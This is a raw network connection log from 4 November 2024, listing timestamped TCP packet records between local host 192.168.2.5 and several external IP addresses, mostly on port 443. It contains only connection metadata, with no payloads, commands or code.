Nov 4, 2024 17:31:59.650391102 CET	443	49901	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.650454998 CET	49901	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.650793076 CET	49901	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.650805950 CET	443	49901	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.650819063 CET	49901	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.650830030 CET	443	49901	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.653575897 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.653619051 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.653685093 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.653810978 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.653820992 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.741636992 CET	443	49902	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.741674900 CET	443	49902	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.741743088 CET	443	49902	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.741893053 CET	49902	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.741893053 CET	49902	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.741894007 CET	49902	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.741934061 CET	49902	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.741944075 CET	443	49902	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.747668028 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.747699976 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.747797966 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.747921944 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.747934103 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.771693945 CET	443	49903	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.771761894 CET	443	49903	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.771831036 CET	49903	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.772506952 CET	49903	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.772526979 CET	443	49903	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.772543907 CET	49903	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.772551060 CET	443	49903	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.776377916 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.776413918 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:59.776504993 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.776628971 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:59.776638031 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.136084080 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.136533022 CET	49904	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.136550903 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.137125015 CET	49904	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.137130022 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.267292023 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.267337084 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.267388105 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.267394066 CET	49904	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.267431021 CET	49904	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.267611980 CET	49904	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.267623901 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.267641068 CET	49904	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.267647028 CET	443	49904	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.270236015 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.270273924 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.270382881 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.270607948 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.270621061 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.323988914 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.324395895 CET	49905	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.324407101 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.324901104 CET	49905	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.324903965 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.386044025 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.386405945 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.386420012 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.386840105 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.386843920 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.444597960 CET	80	49709	217.20.57.36	192.168.2.5
Nov 4, 2024 17:32:00.444763899 CET	49709	80	192.168.2.5	217.20.57.36
Nov 4, 2024 17:32:00.444802999 CET	49709	80	192.168.2.5	217.20.57.36
Nov 4, 2024 17:32:00.449795961 CET	80	49709	217.20.57.36	192.168.2.5
Nov 4, 2024 17:32:00.453620911 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.453689098 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.453751087 CET	49905	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.453959942 CET	49905	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.453982115 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.453993082 CET	49905	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.453999043 CET	443	49905	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.456605911 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.456645012 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.456722021 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.456854105 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.456868887 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.479391098 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.479820967 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.479831934 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.480272055 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.480278015 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.514723063 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.515093088 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.515110016 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.515494108 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.515501022 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.517105103 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.517127991 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.517184019 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.517240047 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.517280102 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.517509937 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.517529011 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.517540932 CET	49906	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.517546892 CET	443	49906	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.519984961 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.520018101 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.520158052 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.520209074 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.520224094 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.610325098 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.610404968 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.610493898 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.611284018 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.611301899 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.611319065 CET	49907	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.611325979 CET	443	49907	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.614218950 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.614260912 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.614342928 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.614479065 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.614491940 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.649734020 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.649760962 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.649843931 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.649847031 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.649894953 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.650075912 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.650094032 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.650105953 CET	49908	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.650111914 CET	443	49908	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.652694941 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.652729988 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:00.652801037 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.652934074 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:00.652947903 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.002413988 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.002895117 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.002908945 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.003344059 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.003350019 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.132379055 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.132414103 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.132476091 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.132524014 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.132524014 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.132651091 CET	49909	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.132671118 CET	443	49909	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.135617971 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.135658026 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.135723114 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.135863066 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.135874987 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.233854055 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.234311104 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.234328985 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.234786987 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.234792948 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.239811897 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.240278959 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.240291119 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.240679026 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.240684032 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.359127998 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.360708952 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.360722065 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.361177921 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.361183882 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370075941 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370079994 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370101929 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370150089 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.370156050 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370166063 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370207071 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.370281935 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.370373964 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.370373964 CET	49911	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.370392084 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370403051 CET	443	49911	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.370426893 CET	49910	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.370445967 CET	443	49910	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.372240067 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.375981092 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.375989914 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.376405954 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.376410007 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.377043962 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.377054930 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.377116919 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.377290010 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.377295971 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.377724886 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.377748013 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.377841949 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.377979040 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.377986908 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.490556002 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.490588903 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.490633965 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.490636110 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.490696907 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.491177082 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.491197109 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.491209030 CET	49912	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.491214991 CET	443	49912	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.493786097 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.493828058 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.493911982 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.494056940 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.494071007 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.500507116 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.500616074 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.500679016 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.500720024 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.500736952 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.500747919 CET	49913	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.500754118 CET	443	49913	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.503099918 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.503127098 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.503232002 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.503345966 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.503359079 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.895337105 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.899701118 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.899715900 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:01.900208950 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:01.900214911 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.026125908 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.026146889 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.026197910 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.026262045 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.026263952 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.053658962 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.053684950 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.053692102 CET	49914	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.053699017 CET	443	49914	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.058883905 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.058927059 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.059045076 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.059281111 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.059298992 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.107018948 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.107654095 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.141753912 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.141762972 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.142335892 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.142342091 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.142725945 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.142735004 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.143176079 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.143181086 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.225627899 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.231789112 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.231817007 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.235807896 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.235819101 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.237451077 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.240466118 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.240478992 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.244674921 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.244678974 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.268784046 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.268924952 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.269004107 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.270407915 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.270418882 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.270428896 CET	49915	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.270435095 CET	443	49915	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.271214008 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.271239996 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.271291018 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.271318913 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.271332979 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.274960995 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.274960995 CET	49916	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.274971008 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.274980068 CET	443	49916	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.301136971 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.301173925 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.301276922 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.313414097 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.313441992 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.313539028 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.313808918 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.313822031 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.313886881 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.313899040 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.654696941 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:02.654752970 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:02.654850006 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:02.655430079 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:02.655442953 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:02.756813049 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.756827116 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.756840944 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.756891012 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.756905079 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.756942034 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.756958008 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.756970882 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.757122040 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.757138968 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.757168055 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.757168055 CET	49918	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.757164955 CET	49917	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.757174969 CET	443	49917	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.757180929 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.757189035 CET	443	49918	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.760029078 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.760080099 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.760122061 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.760143995 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.760185957 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.760195971 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.760309935 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.760329008 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.760365963 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.760377884 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.888603926 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.889085054 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.889102936 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:02.889532089 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:02.889538050 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.049138069 CET	49925	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:03.054055929 CET	80	49925	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:03.054153919 CET	49925	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:03.054347038 CET	49925	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:03.059489965 CET	80	49925	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:03.084625006 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.084703922 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.084772110 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.085150003 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.085167885 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.085180998 CET	49919	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.085186958 CET	443	49919	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.088362932 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.088387966 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.088474989 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.088663101 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.088673115 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.479933977 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.480572939 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.480590105 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.481053114 CET	49923	443	192.168.2.5	13.107.246.45
